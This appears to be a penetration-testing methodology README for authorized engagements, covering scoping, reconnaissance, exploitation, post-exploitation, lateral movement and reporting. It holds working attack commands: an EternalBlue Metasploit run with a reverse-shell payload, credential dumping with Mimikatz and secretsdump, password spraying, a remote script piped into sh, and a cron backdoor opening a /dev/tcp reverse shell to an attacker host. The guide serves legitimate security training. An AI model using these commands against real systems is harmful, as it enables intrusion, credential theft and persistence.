A structured, repeatable framework for conducting professional security assessments.
All activities must be performed only on systems you are explicitly authorized to test.
- Pre-Engagement
- Reconnaissance
- Scanning & Enumeration
- Vulnerability Analysis
- Exploitation
- Post-Exploitation
- Lateral Movement
- Reporting
- Remediation & Retesting
- Tools Reference
The foundation of any legitimate penetration test. Poor scoping is the most common cause of failed or disputed engagements.
- Define scope explicitly: IP ranges, domains, applications, physical locations
- Define out-of-scope assets just as clearly
- Establish authorized testing windows (maintenance windows, business hours, 24/7)
- Identify emergency contacts and escalation paths
- Agree on data handling procedures for sensitive data encountered during testing
- Get written authorization — no exceptions
| Type | Description |
|---|---|
| Black Box | No prior knowledge; simulates external attacker |
| Grey Box | Partial knowledge (architecture diagrams, credentials) |
| White Box | Full knowledge; source code, infrastructure details |
| Red Team | Adversarial simulation; goal-based, not vulnerability-based |
| Purple Team | Collaborative; attacker and defender work together |
- Signed Statement of Work (SoW)
- Signed Rules of Engagement
- Scope confirmation in writing
- Emergency stop conditions and contacts
- Legal review if cross-border testing
Gather information without directly interacting with target systems.
Domain & DNS
whois target.com
dig target.com ANY
dnsx -d target.com -a -aaaa -cname -mx -ns -txt
amass enum -passive -d target.com
subfinder -d target.com -silentCertificate Transparency
# Search crt.sh for subdomains
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | sort -uGoogle Dorks
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com intitle:"index of"
"target.com" ext:conf OR ext:env OR ext:log
Email & Employee Enumeration
theHarvester -d target.com -b all
hunter.io # API-based email pattern discovery
linkedin-osint / CrossLinkedCode & Secret Leakage
# Search GitHub for exposed secrets
truffleHog --regex --entropy=False https://github.com/target/repo
gitleaks detect --source=/path/to/repo
# Also search: Pastebin, GreyNoise, Shodan, CensysDirect interaction with target infrastructure — ensure this is within scope.
DNS Brute-forcing
dnsx -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d target.com -w wordlist.txtShodan / Censys Queries
org:"Target Company Name"
hostname:target.com
ssl.cert.subject.cn:target.com
# Ping sweep
nmap -sn 10.10.10.0/24 -oG sweep.txt
# ARP scan (local network)
arp-scan --localnet
# Masscan for speed at scale
masscan -p1-65535 10.10.10.0/24 --rate=1000# Full TCP scan on discovered hosts
nmap -sS -sV -sC -O -p- --min-rate 5000 -oA full_scan 10.10.10.10
# UDP scan (top ports)
nmap -sU --top-ports 200 -oA udp_scan 10.10.10.10
# Aggressive scan (only when noise is acceptable)
nmap -A -T4 -p- 10.10.10.10Web (HTTP/HTTPS)
# Directory & file brute-force
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt,bak
feroxbuster -u https://target.com --depth 3
# Technology fingerprinting
whatweb https://target.com
wappalyzer (browser extension)
wafw00f https://target.com # WAF detection
# Screenshot at scale
eyewitness --web --prepend-https -f hosts.txt
gowitness scan --cidr 10.10.10.0/24SMB
smbclient -L //10.10.10.10 -N
enum4linux-ng -A 10.10.10.10
nmap --script smb-vuln* -p 445 10.10.10.10
crackmapexec smb 10.10.10.0/24LDAP / Active Directory
ldapsearch -x -H ldap://10.10.10.10 -b "DC=target,DC=com"
bloodhound-python -u user -p pass -d target.com -c All
enum4linux-ng -A -u user -p pass 10.10.10.10Other Common Services
# FTP
nmap --script ftp-anon,ftp-bounce -p 21 10.10.10.10
# SSH
nmap --script ssh-auth-methods -p 22 10.10.10.10
# SNMP
snmpwalk -v 2c -c public 10.10.10.10
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.10.10.10
# SMTP
nmap --script smtp-enum-users -p 25 10.10.10.10# Network
nessus / openvas (authenticated preferred)
nmap --script vuln 10.10.10.10
# Web
nikto -h https://target.com
nuclei -u https://target.com -t ~/nuclei-templates/
# SSL/TLS
testssl.sh https://target.com
sslyze --regular target.com:443Automated scanners miss logic flaws, chained vulnerabilities, and business-context issues. Always supplement with:
- Manual browsing with Burp Suite / ZAP proxy
- Source code review (if white box)
- Configuration review
- Authentication and session management testing
- Business logic testing (price manipulation, workflow bypass)
- API testing (Postman, custom scripts)
# Search for known vulnerabilities in identified versions
searchsploit apache 2.4.49
# Cross-reference: NVD, ExploitDB, Vulners, Packet Storm
# Check vendor advisories and patch notesDocument every action with timestamps. Do not exploit systems outside the agreed scope or window.
- Prioritize — exploit critical findings first; chain low-severity issues when possible
- Minimize impact — avoid DoS unless explicitly authorized; prefer PoC over destructive payloads
- Log everything — terminal logs, screenshots, timestamps
- Validate — confirm you have the access you think you have before proceeding
OWASP Top 10 Focus Areas
| Vulnerability | Key Tools |
|---|---|
| Injection (SQLi, SSTI, LDAP) | sqlmap, manual Burp |
| Broken Authentication | Hydra, custom scripts |
| IDOR / Access Control | Manual testing, Burp Autorize |
| XSS | XSSHunter, Dalfox, manual |
| XXE | Manual Burp payloads |
| SSRF | Manual + SSRF-specific wordlists |
| Insecure Deserialization | ysoserial, PHPGGC |
| Misconfiguration | Nuclei templates, manual review |
# SQL Injection
sqlmap -u "https://target.com/page?id=1" --dbs --batch
# XSS Discovery
dalfox url "https://target.com/search?q=FUZZ"
# SSRF
# Intercept with Burp, test internal endpoints:
# http://169.254.169.254/latest/meta-data/ (AWS)
# http://metadata.google.internal/ (GCP)# Metasploit Framework
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.1
run
# Password attacks
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
crackmapexec smb 10.10.10.0/24 -u users.txt -p passwords.txt --continue-on-success
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u Administrator -H <NTLM_HASH>
impacket-psexec Administrator@10.10.10.10 -hashes :NTLM_HASH# Password spraying (be mindful of lockout policies)
kerbrute passwordspray -d target.com --dc 10.10.10.10 users.txt 'Password123!'
# Kerberoasting
impacket-GetUserSPNs target.com/user:password -dc-ip 10.10.10.10 -request
# AS-REP Roasting
impacket-GetNPUsers target.com/ -usersfile users.txt -dc-ip 10.10.10.10
# Crack hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt # Kerberoast
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt # AS-REP# Linux
id && whoami && hostname
cat /etc/passwd && cat /etc/shadow
find / -perm -4000 2>/dev/null # SUID binaries
find / -writable -type f 2>/dev/null # Writable files
sudo -l # Sudo privileges
crontab -l && cat /etc/crontab # Cron jobs
ss -tulnp # Open ports/services
env && cat ~/.bash_history
# Automated: LinPEAS / LinEnum
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Windows
whoami /all
systeminfo
net users && net localgroup administrators
tasklist /svc
netstat -ano
# Automated: WinPEAS / PowerUp / JAWS
.\winPEASx64.exeLinux
- SUID/SGID abuse → GTFOBins
- Sudo misconfigurations
- Writable cron jobs / PATH hijacking
- Kernel exploits (last resort)
- Capabilities (
getcap -r / 2>/dev/null) - NFS no_root_squash
Windows
- Token impersonation (SeImpersonatePrivilege → Potato attacks)
- Unquoted service paths reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Weak service permissions
- AlwaysInstallElevated
- DLL hijacking
- Credential harvesting (SAM, LSASS)
# Dump credentials (Windows)
# LSASS via Mimikatz
sekurlsa::logonpasswords
# SAM via impacket (remote)
impacket-secretsdump Administrator:password@10.10.10.10Only establish persistence mechanisms explicitly authorized in the RoE.
# Linux: cron backdoor example (document before adding)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'" >> /var/spool/cron/root
# Windows: registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\payload.exe"
# Always document and remove at end of engagement unless retaining for client demo# SSH tunneling
ssh -L 8080:internal-host:80 user@pivot-host # Local forward
ssh -R 9090:localhost:9090 user@pivot-host # Remote forward
ssh -D 1080 user@pivot-host # SOCKS proxy
# Chisel (HTTP tunneling)
# On attacker:
./chisel server -p 8000 --reverse
# On pivot:
./chisel client 10.10.14.1:8000 R:socks
# Proxychains config
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn 172.16.0.0/24# Pass-the-Ticket (Kerberos)
impacket-getTGT target.com/user:password
export KRB5CCNAME=user.ccache
impacket-psexec -k -no-pass target.com/user@DC01.target.com
# DCSync (dump all hashes from DC)
impacket-secretsdump -just-dc target.com/admin:password@10.10.10.10
# BloodHound path analysis
bloodhound-python -u user -p pass -d target.com -ns 10.10.10.10 -c All
# Upload to BloodHound, find shortest path to DA| Attack | Condition |
|---|---|
| Pass-the-Hash | NTLM hash of privileged account |
| Pass-the-Ticket | Valid Kerberos TGT/TGS |
| Kerberoasting | Service accounts with SPNs set |
| AS-REP Roasting | Accounts with pre-auth disabled |
| ACL Abuse | WriteDACL / GenericAll / GenericWrite |
| GPO Abuse | Write access to Group Policy Object |
| DCSync | Replication rights on domain |
| Golden Ticket | krbtgt hash obtained |
| Silver Ticket | Service account hash obtained |
A finding with no report is a finding that doesn't get fixed. Reports are the primary deliverable.
1. Executive Summary
- Engagement overview (dates, scope, methodology)
- High-level risk rating
- Key findings summary (non-technical)
- Recommendations overview
2. Scope & Methodology
- Testing scope (in/out of scope)
- Testing types performed
- Tools used
- Limitations and caveats
3. Findings
- One section per finding (see 8.2)
- Ordered by severity: Critical → High → Medium → Low → Informational
4. Appendices
- Raw scan output
- Tool configurations
- Credentials discovered (handled securely)
- Testing timeline / activity log
## [FIND-001] Unauthenticated Remote Code Execution in Apache Struts
**Severity:** Critical
**CVSS Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
**Affected Asset:** app.target.com (10.10.10.10:443)
**CVE:** CVE-XXXX-XXXX
### Description
A brief, clear explanation of the vulnerability — what it is and why it exists.
### Impact
What an attacker can achieve. Be specific and business-relevant.
Example: An unauthenticated attacker can execute arbitrary OS commands as the `www-data`
user, leading to full server compromise and potential access to the internal network.
### Steps to Reproduce
1. Send a crafted POST request to `/struts/action`
2. ...
3. Observe command execution in the response
### Evidence
[Screenshot / redacted output]
### Remediation
Specific, actionable fix. Reference vendor advisory if applicable.
Example: Upgrade Apache Struts to version 2.5.33 or later. Apply vendor patch
OGNL-2023-0001. See: https://struts.apache.org/security/
### References
- https://nvd.nist.gov/vuln/detail/CVE-XXXX-XXXX
- https://vendor.advisory.url| Rating | CVSS Range | Description |
|---|---|---|
| Critical | 9.0–10.0 | Immediate exploitation risk, business-threatening impact |
| High | 7.0–8.9 | Significant risk, exploitable with low complexity |
| Medium | 4.0–6.9 | Exploitable with some complexity or limited impact |
| Low | 0.1–3.9 | Minimal risk, defense-in-depth improvement |
| Informational | N/A | Best practices, hardening recommendations |
- Provide the client with a remediation window appropriate to severity (e.g., Critical: 24h–7 days, High: 30 days)
- Offer a retest for all Critical and High findings at no additional cost (negotiate this upfront)
- During retest, verify the fix is complete — not just the specific PoC, but the root cause
- Update the report with retest results and a closure date for each finding
- Issue a Letter of Attestation for findings that pass retest (useful for compliance)
| Tool | Purpose |
|---|---|
| Amass | Subdomain enumeration |
| Subfinder | Passive subdomain discovery |
| theHarvester | Email, domain, OSINT gathering |
| Shodan / Censys | Internet-wide host discovery |
| DNSx | DNS resolution at scale |
| Recon-ng | Modular OSINT framework |
| Tool | Purpose |
|---|---|
| Nmap | Port scanning, service detection |
| Masscan | High-speed port scanning |
| Gobuster / Feroxbuster | Directory/file brute-forcing |
| Nuclei | Template-based vulnerability scanning |
| Nikto | Web server misconfiguration scanning |
| Enum4linux-ng | SMB/LDAP enumeration |
| Tool | Purpose |
|---|---|
| Metasploit | Exploit framework |
| Burp Suite | Web application testing proxy |
| SQLmap | Automated SQL injection |
| Impacket | Windows/AD protocol toolset |
| CrackMapExec | SMB/AD Swiss army knife |
| Hydra | Online password brute-forcing |
| Tool | Purpose |
|---|---|
| Mimikatz | Credential extraction (Windows) |
| LinPEAS / WinPEAS | Privilege escalation enumeration |
| BloodHound | Active Directory attack path mapping |
| Chisel | TCP/UDP tunneling over HTTP |
| Ligolo-ng | Advanced tunneling / pivoting |
| Resource | Use |
|---|---|
| SecLists | Comprehensive wordlist collection |
| RockYou | Password cracking |
| CeWL | Custom wordlist generation from target site |
This methodology is intended for authorized security assessments only. Unauthorized access to computer systems is illegal in most jurisdictions and carries serious civil and criminal penalties.
Always:
- Obtain explicit written authorization before testing
- Stay within the agreed scope
- Handle client data with care — minimize collection, store securely, destroy after engagement
- Follow responsible disclosure if out-of-scope vulnerabilities are accidentally discovered
- Adhere to the code of ethics of any professional bodies you belong to (OSCP, CEH, CREST, etc.)
Maintained by @0xNullVector · Contributions welcome via PR